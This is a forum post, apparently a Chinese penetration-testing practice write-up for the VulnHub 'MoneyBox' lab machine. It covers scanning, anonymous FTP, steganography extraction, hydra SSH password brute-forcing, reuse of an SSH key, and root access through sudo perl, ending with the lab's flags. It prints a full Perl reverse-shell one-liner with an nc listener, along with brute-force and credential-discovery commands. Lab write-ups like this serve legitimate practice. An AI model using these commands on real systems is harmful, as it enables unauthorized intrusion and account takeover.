ToB企服应用市场:ToB评测及商务社交产业平台

标题: vulnhub-MoneyBox [打印本页]

作者: 农妇山泉一亩田    时间: 2024-4-11 03:48
标题: vulnhub-MoneyBox
MoneyBox

渗透测试日常练习
0x01 信息收集

一、主机扫描

kali有很多工具可以扫描存活主机,像fping,我这里偷一下懒,用nmap直接扫。

扫到一个 192.168.56.102 的主机,开启 80,21,22端口。先来访问一下 80 端口吧。

页面上没什么可用信息,继续信息收集。
二、遍历目录

  1. [14:29:07] 301 -  316B  - /blogs  ->  http://192.168.56.102/blogs/
复制代码
这里扫到了一个 blogs 目录,访问看看。

页面还是没什么信息,右键源代码看看。看到最下面有一句话
  1. [/code]hint说的是有一个 S3cr3t-T3xt 目录。
  2. 同样的访问后右键源代码,最下面有一句话
  3. [code]
复制代码
这里告诉了我们一个密钥是 3xtr4ctd4t4 ,暂时不知道是干嘛的,先放着。
页面到这就没什么可以收集的了。
三、FTP登录

上面 nmap 扫出来的还有一个 21 端口,于是直接使用 ftp 匿名登录就可以了。

登录成功,目录下有一个 trytofind.jpg ,下载下来看看。
  1. get trytofind.jpg
复制代码
0x02 图片隐写

根据前面获取到的密钥,这里可以猜测是图片隐写,最常见的是 steghide。
尝试一下
  1. steghide --extract -sf trytofind.jpg -p 3xtr4ctd4t4
复制代码
在当前目录生成了一个 data.txt 文件,内容如下
  1. Hello.....  renu
  2.       I tell you something Important.Your Password is too Week So Change Your Password
  3. Don't Underestimate it.......
复制代码
从这里可以收集到这台主机的其中一个用户名是 renu。不知道密码,但是他又说密码很弱,于是应该可以尝试爆破一下。

0x03 密码爆破

密码爆破工具最常用的是 hydra。
  1. hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.102
复制代码
rockyou.txt 是kali自带的字典,需要解压一下。
  1. [22][ssh] host: 192.168.56.102   login: renu   password: 987654321
复制代码
这里也是很快就把密码爆破出来了。

0x04 RENU登录

账户密码都知道了,登录下试试。

成功登录!这里也是拿到了第一个 flag


0x05 LILY登录

执行 cat /etc/passwd 看看还有其他账户没
  1. root:x:0:0:root:/root:/bin/bash
  2. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  3. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  4. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  5. sync:x:4:65534:sync:/bin:/bin/sync
  6. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  7. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  8. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  9. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  10. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  11. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  12. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  13. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  14. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  15. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  16. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  17. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  18. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  19. _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
  20. systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
  21. systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
  22. systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
  23. lily:x:1000:1000:lily,,,:/home/lily:/bin/bash
  24. systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
  25. ftp:x:104:111:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
  26. renu:x:1001:1001::/home/renu:/bin/bash
  27. messagebus:x:105:112::/nonexistent:/usr/sbin/nologin
  28. sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
复制代码
可以看到还有一个 lily 用户,但是不知道密码。这里也是浪费了很多时间在找密码,最后看到了一个文件存放着历史命令
  1. ssh-keygen -t rsa
  2. clear
  3. cd .ssh
  4. ls
  5. ssh-copy-id lily@192.168.43.80
  6. clear
  7. cd
  8. cd -
  9. ls -l
  10. chmod 400 id_rsa
  11. ls -l
  12. ssh -i id_rsa lily@192.168.43.80
  13. clear
  14. ssh -i id_rsa lily@192.168.43.80
  15. cd
  16. clear
  17. cd .ssh/
  18. ls
  19. ssh -i id_rsa lily@192.168.43.80
  20. su lily
  21. clear
  22. cd
  23. sudo apt install openssh
  24. sudo apt update
  25. sudo apt install openssh-server
  26. sudo service ssh start
  27. sudo service ssh status
复制代码
这里看着像远程连接 192.168.43.80 这台主机上的 lily,但是现在没有 192.168.43.80 这台主机啊,于是猜测如果 192.168.43.80 是原本这台主机的 ip 的话,那么不就可以直接用 ssh lily@127.0.0.1 本地连接。尝试一下

ok,成功登录!在 /home/lily 目录下找到了第二个 flag。


0x06 提升权限

sudo -l 查看账户情况

这里的 perl 命令是可以以 root 账户来执行,而且不需要密码。perl 能执行什么命令啊?之前学过 perl 的反弹 shell,于是尝试反弹 shell。
  1. sudo perl -e 'use Socket;$i="[ip]";$p=[port];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
复制代码
再开启一个终端执行监听
  1. nc -lvvp 2333
复制代码
注意:前面要加 sudo 来执行。
成功登录 root 账户。

flag 在 /root/ 下,是一个隐藏文件: .root.txt

0x07 总结

flag 如下:
  1. us3r1{F14g:0ku74tbd3777y4}
  2. us3r{F14g:tr5827r5wu6nklao}
  3. r00t{H4ckth3p14n3t}
复制代码
这台主机不难,最重要的还是细心。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4